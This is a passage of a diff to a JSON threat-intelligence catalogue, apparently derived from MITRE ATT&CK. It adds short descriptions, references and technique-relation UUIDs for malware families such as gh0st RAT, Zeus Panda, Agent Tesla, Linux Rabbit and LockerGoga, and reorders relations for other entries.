"2d646840-f6f5-4619-a5a8-29c8316bbac5", "tags": [ @@ -364,6 +308,48 @@ ], "type": "uses" }, + { + "dest-uuid": "4e6620ac-c30c-4f6d-918e-fa20cae7c1ce", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b3c2e5de-0941-4b57-ba61-af029eb5517a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "99e6295e-741b-4857-b6e5-64989eb039b4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "79eec66a-9bd0-4a3f-ac82-19159e94bd44", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "fd339382-bfec-4bf0-8d47-1caedc9e7e57", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "702055ac-4e54-4ae9-9527-e23a38e0b160", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "c5089859-b21f-40a3-8be4-63e381b8b1c0", "tags": [ @@ -371,6 +357,20 @@ ], "type": "uses" }, + { + "dest-uuid": "d4536441-1bcc-49fa-80ae-a596ed3f7ffd", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "6683aa0c-d98a-4f5b-ac57-ca7e9934a760", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "e2ea7f6b-8d4f-49c3-819d-660530d12b77", "tags": [ @@ -383,7 +383,128 @@ "value": "Pegasus for iOS - S0289" }, { - "description": "[China Chopper](https://attack.mitre.org/software/S0020) is a [Web Shell](http://attack.mitre.org/techniques/T1100) hosted on Web servers to provide access back into an enterprise network that does not rely on an infected system calling back to a remote command and control server. (Citation: Lee 2013) It has been used by several threat groups. (Citation: Dell TG-3390) (Citation: FireEye Periscope March 2018)", + "description": "[gh0st RAT](https://attack.mitre.org/software/S0032) is a remote access tool (RAT). The source code is public and it has been used by multiple groups. (Citation: FireEye Hacking Team)(Citation: Arbor Musical Chairs Feb 2018)(Citation: Nccgroup Gh0st April 2018)", + "meta": { + "external_id": "S0032", + "mitre_platforms": [ + "Windows", + "macOS" + ], + "refs": [ + "https://attack.mitre.org/software/S0032", + "https://www.fireeye.com/blog/threat-research/2015/07/demonstrating_hustle.html", + "https://www.arbornetworks.com/blog/asert/musical-chairs-playing-tetris/", + "https://www.nccgroup.trust/us/about-us/newsroom-and-events/blog/2018/april/decoding-network-data-from-a-gh0st-rat-variant/" + ], + "synonyms": [ + "gh0st RAT" + ] + }, + "related": [ + { + "dest-uuid": "1b1ae63f-bcee-4aba-8994-6c60cee5e16f", + "tags": [ + "estimative-language:likelihood-probability=\"likely\"" + ], + "type": "similar" + }, + { + "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b2001907-166b-4d71-bb3c-9d26c871de09", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "62b8c999-dcc0-4755-bd69-09442d9359f5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + } + ], + "uuid": "88c621a7-aef9-4ae0-94e3-1fc87123eb24", + "value": "gh0st RAT - S0032" + }, + { + "description": "[China Chopper](https://attack.mitre.org/software/S0020) is a [Web Shell](https://attack.mitre.org/techniques/T1100) hosted on Web servers to provide access back into an enterprise network that does not rely on an infected system calling back to a remote command and control server. (Citation: Lee 2013) It has been used by several threat groups. (Citation: Dell TG-3390) (Citation: FireEye Periscope March 2018)", "meta": { "external_id": "S0020", "mitre_platforms": [ @@ -407,6 +528,13 @@ ], "type": "uses" }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ @@ -422,14 +550,49 @@ "type": "uses" }, { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e3a12395-188d-4051-9a16-ea8e14d07b88", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "a93494bb-4b80-4ea1-8695-3236a49916fd", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "6ff403bc-93e3-48be-8687-e102fdba8c88", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "128c55d3-aeba-469f-bd3e-c8996ab4112a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -447,8 +610,7 @@ "Windows" ], "refs": [ - "https://attack.mitre.org/software/S0007", - "http://www.secureworks.com/cyber-threat-intelligence/threats/skeleton-key-malware-analysis/" + "https://attack.mitre.org/software/S0007" ], "synonyms": [ "Skeleton Key" @@ -518,27 +680,6 @@ ], "type": "uses" }, - { - "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", "tags": [ @@ -547,7 +688,7 @@ "type": "uses" }, { - "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -566,6 +707,27 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "ab3580c8-8435-4117-aace-3d9fbe46aa56", @@ -612,6 +774,181 @@ "uuid": "b2203c59-4089-4ee4-bfe1-28fa25f0dbfe", "value": "Cherry Picker - S0107" }, + { + "description": "[Zeus Panda](https://attack.mitre.org/software/S0330) is a Trojan designed to steal banking information and other sensitive credentials for exfiltration. [Zeus Panda](https://attack.mitre.org/software/S0330)’s original source code was leaked in 2011, allowing threat actors to use its source code as a basis for new malware variants. It is mainly used to target Windows operating systems ranging from Windows XP through Windows 10.(Citation: Talos Zeus Panda Nov 2017)(Citation: GDATA Zeus Panda June 2017)", + "meta": { + "external_id": "S0330", + "mitre_platforms": [ + "Windows" + ], + "refs": [ + "https://attack.mitre.org/software/S0330", + "https://blog.talosintelligence.com/2017/11/zeus-panda-campaign.html#More", + "https://cyberwtf.files.wordpress.com/2017/07/panda-whitepaper.pdf" + ], + "synonyms": [ + "Zeus Panda" + ] + }, + "related": [ + { + "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "241814ae-de3f-4656-b49e-f9a80764d4b7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f3c544dc-673c-4ef3-accb-53229f1ae077", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "66f73398-8394-4711-85e5-34c8540b22a5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "30973a08-aed9-4edf-8604-9084ce1b5c4f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + } + ], + "uuid": "198db886-47af-4f4c-bff5-11b891f85946", + "value": "Zeus Panda - S0330" + }, { "description": "[SpyNote RAT](https://attack.mitre.org/software/S0305) (Remote Access Trojan) is a family of malicious Android apps. The [SpyNote RAT](https://attack.mitre.org/software/S0305) builder tool can be used to develop malicious apps with the malware's functionality. (Citation: Zscaler-SpyNote)", "meta": { @@ -636,14 +973,21 @@ "type": "uses" }, { - "dest-uuid": "6683aa0c-d98a-4f5b-ac57-ca7e9934a760", + "dest-uuid": "99e6295e-741b-4857-b6e5-64989eb039b4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "99e6295e-741b-4857-b6e5-64989eb039b4", + "dest-uuid": "bd4d32f5-eed4-4018-a649-40b229dd1d69", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "6683aa0c-d98a-4f5b-ac57-ca7e9934a760", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -662,13 +1006,6 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" - }, - { - "dest-uuid": "bd4d32f5-eed4-4018-a649-40b229dd1d69", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" } ], "uuid": "20dbaf05-59b8-4dc6-8777-0b17f4553a23", @@ -704,13 +1041,6 @@ ], "type": "uses" }, - { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "3b3cbbe0-6ed3-4334-b543-3ddfd8c5642d", "tags": [ @@ -725,6 +1055,13 @@ ], "type": "uses" }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "6aabc5ec-eae6-422c-8311-38d45ee9838a", "tags": [ @@ -773,13 +1110,6 @@ ], "type": "uses" }, - { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ @@ -795,7 +1125,7 @@ "type": "uses" }, { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -807,6 +1137,13 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "8e461ca3-0996-4e6e-a0df-e2a5bbc51ebc", @@ -899,14 +1236,14 @@ "type": "uses" }, { - "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "dest-uuid": "cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f", + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -916,6 +1253,161 @@ "uuid": "f5352566-1a64-49ac-8f7f-97e1d1a03300", "value": "AutoIt backdoor - S0129" }, + { + "description": "[Agent Tesla](https://attack.mitre.org/software/S0331) is a spyware Trojan written in visual basic.(Citation: Fortinet Agent Tesla April 2018)", + "meta": { + "external_id": "S0331", + "mitre_platforms": [ + "Windows" + ], + "refs": [ + "https://attack.mitre.org/software/S0331", + "https://www.fortinet.com/blog/threat-research/analysis-of-new-agent-tesla-spyware-variant.html", + "https://blog.talosintelligence.com/2018/10/old-dog-new-tricks-analysing-new-rtf_15.html", + "https://www.digitrustgroup.com/agent-tesla-keylogger/" + ], + "synonyms": [ + "Agent Tesla" + ] + }, + "related": [ + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f3c544dc-673c-4ef3-accb-53229f1ae077", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "30973a08-aed9-4edf-8604-9084ce1b5c4f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "2e0dd10b-676d-4964-acd0-8a404c92b044", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "a19e86f8-1c0a-4fea-8407-23b73d615776", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "d54416bd-0803-41ca-870a-ce1af7c05638", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "6faf650d-bf31-4eb4-802d-1000cf38efaf", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + } + ], + "uuid": "e7a5229f-05eb-440e-b982-9a6d2b2b87c8", + "value": "Agent Tesla - S0331" + }, { "description": "[Power Loader](https://attack.mitre.org/software/S0177) is modular code sold in the cybercrime market used as a downloader in malware families such as Carberp, Redyms and Gapz. (Citation: MalwareTech Power Loader Aug 2013) (Citation: WeLiveSecurity Gapz and Redyms Mar 2013)", "meta": { @@ -962,7 +1454,7 @@ }, "related": [ { - "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -976,21 +1468,7 @@ "type": "uses" }, { - "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -1004,7 +1482,21 @@ "type": "uses" }, { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -1054,7 +1546,7 @@ "type": "uses" }, { - "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", + "dest-uuid": "1c338d0f-a65e-4073-a5c1-c06878849f21", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -1067,6 +1559,13 @@ ], "type": "uses" }, + { + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", "tags": [ @@ -1074,6 +1573,41 @@ ], "type": "uses" }, + { + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "1608f3e1-598a-42f4-a01a-2e252e81728f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "ba8e391f-14b5-496f-81f2-2d5ecd646c1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", "tags": [ @@ -1088,59 +1622,128 @@ ], "type": "uses" }, - { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "1c338d0f-a65e-4073-a5c1-c06878849f21", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "1608f3e1-598a-42f4-a01a-2e252e81728f", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "ba8e391f-14b5-496f-81f2-2d5ecd646c1c", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "82caa33e-d11a-433a-94ea-9b5a5fbef81d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "0c824410-58ff-49b2-9cf2-1c96b182bdf0", "value": "Smoke Loader - S0226" }, + { + "description": "[Linux Rabbit](https://attack.mitre.org/software/S0362) is malware that targeted Linux servers and IoT devices in a campaign lasting from August to October 2018. It shares code with another strain of malware known as Rabbot. The goal of the campaign was to install cryptocurrency miners onto the targeted servers and devices.(Citation: Anomali Linux Rabbit 2018)\n", + "meta": { + "external_id": "S0362", + "mitre_platforms": [ + "Linux" + ], + "refs": [ + "https://attack.mitre.org/software/S0362", + "https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat" + ], + "synonyms": [ + "Linux Rabbit" + ] + }, + "related": [ + { + "dest-uuid": "cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "01df3350-ce05-4bdf-bdf8-0a919a66d4a8", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "54a649ff-439a-41a4-9856-8d144a2551ba", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "a93494bb-4b80-4ea1-8695-3236a49916fd", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + } + ], + "uuid": "0efefea5-78da-4022-92bc-d726139e8883", + "value": "Linux Rabbit - S0362" + }, + { + "description": "[LockerGoga ](https://attack.mitre.org/software/S0372) is ransomware that has been tied to various attacks on European companies. It was first reported upon in January 2019.(Citation: Unit42 LockerGoga 2019)(Citation: CarbonBlack LockerGoga 2019)", + "meta": { + "external_id": "S0372", + "mitre_platforms": [ + "Windows" + ], + "refs": [ + "https://attack.mitre.org/software/S0372", + "https://unit42.paloaltonetworks.com/born-this-way-origins-of-lockergoga/", + "https://www.carbonblack.com/2019/03/22/tau-threat-intelligence-notification-lockergoga-ransomware/" + ], + "synonyms": [ + "LockerGoga " + ] + }, + "related": [ + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b80d107d-fa0d-4b60-9684-b0433e8bdba0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + } + ], + "uuid": "5af7a825-2d9f-400d-931a-e00eb9e27f48", + "value": "LockerGoga - S0372" + }, { "description": "[Stealth Mango](https://attack.mitre.org/software/S0328) is Android malware that has reportedly been used to successfully compromise the mobile devices of government officials, members of the military, medical professionals, and civilians. The iOS malware known as [Tangelo](https://attack.mitre.org/software/S0329) is believed to be from the same developer. (Citation: Lookout-StealthMango)", "meta": { @@ -1158,14 +1761,21 @@ }, "related": [ { - "dest-uuid": "62adb627-f647-498e-b4cc-41499361bacb", + "dest-uuid": "99e6295e-741b-4857-b6e5-64989eb039b4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "6683aa0c-d98a-4f5b-ac57-ca7e9934a760", + "dest-uuid": "4e6620ac-c30c-4f6d-918e-fa20cae7c1ce", + "tags": [ + 